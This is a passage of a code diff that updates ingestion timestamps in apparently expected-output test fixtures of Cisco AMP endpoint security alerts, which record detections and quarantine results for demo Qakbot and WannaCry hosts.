"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1107296272", "kind": "alert", @@ -194,7 +194,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763782800Z", + "ingested": "2021-12-14T14:40:45.520853890Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "2164260880", "kind": "alert", @@ -270,7 +270,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763788800Z", + "ingested": "2021-12-14T14:40:45.520854373Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "2164260880", "kind": "alert", @@ -367,7 +367,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763794800Z", + "ingested": "2021-12-14T14:40:45.520854900Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "code": "1090519054", "kind": "alert", @@ -461,7 +461,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763799500Z", + "ingested": "2021-12-14T14:40:45.520855346Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", @@ -554,7 +554,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763804100Z", + "ingested": "2021-12-14T14:40:45.520855854Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1090519054", "kind": "alert", @@ -648,7 +648,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763807800Z", + "ingested": "2021-12-14T14:40:45.520857326Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", @@ -722,7 +722,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763812600Z", + "ingested": "2021-12-14T14:40:45.520857842Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "553648143", "kind": "alert", @@ -794,7 +794,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763818700Z", + "ingested": "2021-12-14T14:40:45.520858327Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "553648143", "kind": "alert", @@ -866,7 +866,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763824800Z", + "ingested": "2021-12-14T14:40:45.520858757Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "code": "2164260880", "kind": "alert", @@ -942,7 +942,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763831200Z", + "ingested": "2021-12-14T14:40:45.520859322Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "code": "2164260880", "kind": "alert", @@ -1018,7 +1018,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763837500Z", + "ingested": "2021-12-14T14:40:45.520859724Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1094,7 +1094,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763843500Z", + "ingested": "2021-12-14T14:40:45.520860240Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1170,7 +1170,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763848400Z", + "ingested": "2021-12-14T14:40:45.520860684Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1246,7 +1246,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763852200Z", + "ingested": "2021-12-14T14:40:45.520861083Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1322,7 +1322,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763857100Z", + "ingested": "2021-12-14T14:40:45.520861595Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1398,7 +1398,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763863200Z", + "ingested": "2021-12-14T14:40:45.520862152Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1474,7 +1474,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763869300Z", + "ingested": "2021-12-14T14:40:45.520862551Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1550,7 +1550,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763875400Z", + "ingested": "2021-12-14T14:40:45.520862936Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 